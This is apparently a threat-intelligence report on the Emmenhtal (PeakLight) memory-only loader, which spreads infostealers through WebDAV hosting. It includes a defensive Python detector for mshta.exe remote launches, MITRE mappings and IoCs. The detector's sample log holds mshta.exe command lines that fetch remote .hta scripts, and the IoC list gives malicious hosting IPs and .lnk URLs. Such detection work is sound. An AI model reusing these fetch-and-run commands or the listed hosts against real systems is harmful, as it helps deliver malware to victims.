The report tracks the Emmenhtal loader (PeakLight), a memory-only malware loader used to distribute multiple infostealers through a WebDAV-based hosting infrastructure. It also explores the potential for this setup to be offered as Infrastructure-as-a-Service to multiple threat actors, supported by consistent AS hosting and a wide payload ecosystem. #Emmenhtal #PeakLight #WebDAV #mshta #SelfAU3 #DarkGate #Amadey #Remcos #MeduzaStealer #DANABOT #Guloader #Redline #InfrastructureasAService
Keypoints
- The Emmenhtal loader, also known as PeakLight, operates in memory, making it difficult to detect.
- WebDAV is used to host malicious files, enabling distribution of the Emmenhtal loader.
- Malicious “.lnk” files trigger downloads of the loader via the legitimate “mshta.exe” binary.
- A wide variety of malware families, including SelfAU3, DarkGate, and Amadey, have been identified in the infrastructure.
- The infrastructure may be part of an IaaS model for cybercriminals, offering services to multiple actors.
- Consistent use of specific Autonomous Systems (AS) suggests a reliable hosting arrangement for distribution.
- The report emphasizes ongoing vigilance and defensive measures against this evolving threat.
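The key points above describe the execution chain a defender can hunt for: a malicious ".lnk" launches the legitimate "mshta.exe" with an argument that points at WebDAV-hosted content. The following is an added example, not code from the report or from any vendor tool, that runs that detection logic over a few constructed process-creation records. The record format (`Key=Value|Key=Value`), the `REMOTE_PATTERNS` heuristics and the 203.0.113.x addresses are all assumptions made for the example; the idea is simply that mshta.exe reading from an HTTP URL, a `DavWWWRoot` WebDAV path or any UNC path is worth an alert.

```python
import re
from dataclasses import dataclass
from typing import Iterable, Optional

# Assumed detection heuristics (not rules taken from the report). Each pattern
# indicates that mshta.exe is fetching script content from a remote host rather
# than executing a local .hta file:
#   - a plain HTTP(S) URL passed as the argument
#   - the "DavWWWRoot" marker used by the Windows WebDAV mini-redirector
#   - any UNC path (\\host\share\...), which includes the host@port WebDAV form
REMOTE_PATTERNS = [
    ("http-url", re.compile(r"https?://", re.I)),
    ("webdav-davwwwroot", re.compile(r"davwwwroot", re.I)),
    ("unc-path", re.compile(r"\\\\[^\\\s]+\\")),
]


@dataclass
class ProcEvent:
    image: str
    command_line: str
    parent_image: str


def parse_event(line: str) -> Optional[ProcEvent]:
    """Parse one constructed 'Key=Value|Key=Value' process-creation record.

    Returns None when the record lacks the three fields the rule needs.
    """
    fields = {}
    for part in line.strip().split("|"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    try:
        return ProcEvent(fields["Image"], fields["CommandLine"], fields["ParentImage"])
    except KeyError:
        return None


def classify(ev: ProcEvent) -> Optional[str]:
    """Return the name of the first matching heuristic when mshta.exe is
    launched with a remote argument, otherwise None."""
    if not ev.image.lower().endswith("\\mshta.exe"):
        return None
    for name, pattern in REMOTE_PATTERNS:
        if pattern.search(ev.command_line):
            return name
    return None


def scan(lines: Iterable[str]) -> list[tuple[str, str]]:
    """Run the rule over raw records and return (reason, command_line) hits."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        reason = classify(ev)
        if reason:
            hits.append((reason, ev.command_line))
    return hits


# Constructed sample records (documentation-range IPs, not indicators from the
# report). Records 1 and 2 model the lnk -> mshta.exe -> WebDAV chain; record 3
# is mshta.exe running a local file; record 4 is an unrelated process.
SAMPLE_LOG = [
    r"Image=C:\Windows\System32\mshta.exe|CommandLine=mshta.exe http://203.0.113.10/Downloads/update.hta|ParentImage=C:\Windows\explorer.exe",
    r"Image=C:\Windows\System32\mshta.exe|CommandLine=C:\Windows\System32\mshta.exe \\203.0.113.10@80\DavWWWRoot\Downloads\notes.hta|ParentImage=C:\Windows\explorer.exe",
    r"Image=C:\Windows\System32\mshta.exe|CommandLine=mshta.exe C:\Tools\local.hta|ParentImage=C:\Windows\explorer.exe",
    r"Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe http://intranet/readme.txt|ParentImage=C:\Windows\explorer.exe",
]

if __name__ == "__main__":
    for reason, cmd in scan(SAMPLE_LOG):
        print(f"[{reason}] {cmd}")
```

In a real pipeline the same `classify` logic would sit on Sysmon Event ID 1 or Windows Security 4688 records; the parent image is carried in the event so an analyst can confirm the explorer.exe parent that a double-clicked ".lnk" produces. The UNC heuristic will also match legitimate file-share launches, so it is a triage signal rather than a block rule.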
MITRE Techniques
- [T1203] Exploitation for Client Execution – ‘Exploitation of vulnerabilities in software to execute malicious code.’ The Emmenhtal loader leverages this capability to trigger payload execution via lnk-driven downloads.
- [T1071] Command and Control – ‘Use of application layer protocols for command and control communication.’ The infrastructure uses app-layer protocols to communicate with C2 servers.
- [T1053] Persistence – ‘Scheduled task/cron job to maintain persistence.’ The loader maintains its presence through scheduled tasks.
- [T1003] Credential Access – ‘Credential dumping to obtain user credentials.’ Potential credential access to facilitate further exploitation.
- [T1041] Exfiltration – ‘Exfiltration over command and control channel.’ Data may be exfiltrated via the C2 channel.
Indicators of Compromise
- [IP Address] WebDAV hosting addresses observed – 104.131.7.207, 62.133.61.101, and other listed IPs
- [URL] Malicious hosting URLs – 91.92.251.35/Downloads/solaris-docs.lnk, 206.188.196.28/Downloads/example.lnk